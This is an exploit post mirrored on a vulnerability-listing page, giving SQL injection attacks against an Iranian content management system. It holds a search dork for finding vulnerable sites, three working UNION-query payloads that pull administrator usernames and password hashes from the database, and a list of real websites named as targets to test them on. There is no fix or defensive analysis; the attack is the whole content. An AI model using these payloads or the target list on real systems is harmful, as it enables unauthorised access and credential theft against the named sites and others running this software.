Irantechnologhy IRANIAN CMS SQL injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1616217 漏洞类型
发布时间 2019-05-20 更新时间 2019-05-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050216
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# Exploit Title: Irantechnologhy IRANIAN CMS SQL injection
# Date: 2019-05-20
# Dork : [intext:"By Irantechnologhy" inurl:*id=] & [intext:"ایران تکنولوژی" inurl:*id=]
# Exploit Author: S I R M A X
# Vendor Homepage: http://www.iran-tech.com/
# Version: All Version
# Tested on: win,linux
=================================================================================
                                             [SQL injection]     

[+] Method ( Sql injection ) Nullix Security Team of IRan
[+]  parameter  : ID == php?ID=
=================================================================================
Mode Hash : MD5 or NORMAL
=================
[#] Testing Method:

[+] - UNION query

=================================================================================
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Exploits ==> 

[*] 1 => id=-1 Union Select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),4,5,6,7,8,9,10,11--+

[*] 2 => id=-1' Union Select 1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x)--+

[*] 3 => id=1' union select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(memberadmin_tb)WHERE(@x)IN(@x:=CONCAT(0x20,@x,0x75736572,0x203d3d3e20,m_u,0x3c62723e,0x70617373,0x203d3d3e20,m_p,0x3c62723e,0x3c62723e))))x),5,6,7--+

<=> Please test all 3
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
=================================================================================
Demo:
[+] http://arianaagency.com/fa/user/temp.php?irantech_parvaz=1012&id=[SQL]
[+] http://iagp.ir/fa/temp.php?page=1&id=[SQL]
[+] https://karevan2000.com/fa/user/temp.php?irantech_parvaz=specific&id=[SQL]
[+] http://merkid.ir/new/en/user/temp.php?irantech=1&id=[SQL]
=================================================================================
[=] T.me/Sir_Max
[=] Telegram Channel ==> @NullixTM
[+] TNKS K0uR0sH3R
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#